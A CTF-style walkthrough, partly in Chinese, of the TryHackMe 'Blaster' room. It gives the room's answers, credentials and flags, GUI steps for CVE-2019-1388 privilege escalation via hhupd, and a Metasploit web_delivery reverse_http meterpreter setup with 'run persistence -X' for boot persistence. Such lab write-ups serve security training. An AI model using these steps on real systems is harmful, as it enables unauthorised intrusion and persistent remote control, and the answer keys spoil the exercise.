标签:What Blaster machine Windows command our Microsoft Tryhackme
Blaster
文章目录
Task1 Mission Start!
Deploy the machine! This is a Windows box so give it a few minutes (3-5 at max) to come online
Task2 Activate Forward Scanners and Launch Proton Torpedoes
1.How many ports are open on our target system?
2
2.Looks like there’s a web server running, what is the title of the page we discover when browsing to it?
IIS Windows Server
3.Interesting, let’s see if there’s anything else on this web server by fuzzing it. What hidden directory do we discover?
/retro
4.Navigate to our discovered hidden directory, what potential username do we discover?
wade
5.Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?
parzival
6.Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are it’s contents?
使用账密wade:parzival 远程桌面至靶机,在桌面找到user.txt,得到flag为THM{HACK_PLAYER_ONE}
Task3 Breaching the Control Room
1.When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
CVE-2019-1388
Microsoft Windows Certificate Dialog权限提升漏洞 (CVE-2019-1388)
发布日期:2019-11-12
受影响系统:
Microsoft Windows Server 2019;Microsoft Windows Server 2016;Microsoft Windows Server 2012;Microsoft Windows Server 2008 R2;Microsoft Windows Server 2008;Microsoft Windows RT 8.1;Microsoft Windows 8.1;Microsoft Windows 7
2.Looks like an executable file is necessary for exploitation of this vulnerability and the user didn’t really clean up very well after testing it. What is the name of this executable?
hhupd
3.Research vulnerability and how to exploit it. Exploit it now to gain an elevated terminal!
1.右键hhupd程序,显示详细信息;2.点击显示证书信息;3.点击证书颁发者链接,IE浏览器自启动;4.在浏览器右上角,点击另存为;5.关闭错误弹框,删除文件名框中内容;6.在文件名框中输入 C:\Windows\System32*.*,找到cmd;7.右键cmd,点击打开;
4.Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?
nt authority\system
5.Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!
THM{COIN_OPERATED_EXPLOITATION}
Task4 Adoption into the Collective
1.Return to your attacker machine for this next bit. Since we know our victim machine is running Windows Defender, let’s go ahead and try a different method of payload delivery! For this, we’ll be using the script web delivery exploit within Metasploit. Launch Metasploit now and select ‘exploit/multi/script/web_delivery’ for use.
2.First, let’s set the target to PSH (PowerShell). Which target number is PSH?
2
3.After setting your payload, set your lhost and lport accordingly such that you know which port the MSF web server is going to run on and that it’ll be running on the TryHackMe network.
4.Finally, let’s set our payload. In this case, we’ll be using a simple reverse HTTP payload. Do this now with the command: ‘set payload windows/meterpreter/reverse_http’. Following this, launch the attack as a job with the command ‘run -j’.
5.Return to the terminal we spawned with our exploit. In this terminal, paste the command output by Metasploit after the job was launched. In this case, I’ve found it particularly helpful to host a simple python web server (python3 -m http.server) and host the command in a text file as copy and paste between the machines won’t always work. Once you’ve run this command, return to our attacker machine and note that our reverse shell has spawned.
6.Last but certainly not least, let’s look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don’t include anything beyond the base command and the option for boot startup.
run persistence -X
7.Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you’ll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you’ve now gain full control over the remote host and have established persistence for further operations!
gain full control over the remote host and have established persistence for further operations!
标签:What,Blaster,machine,Windows,command,our,Microsoft,Tryhackme 来源: https://blog.csdn.net/qq_36531487/article/details/120903906
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。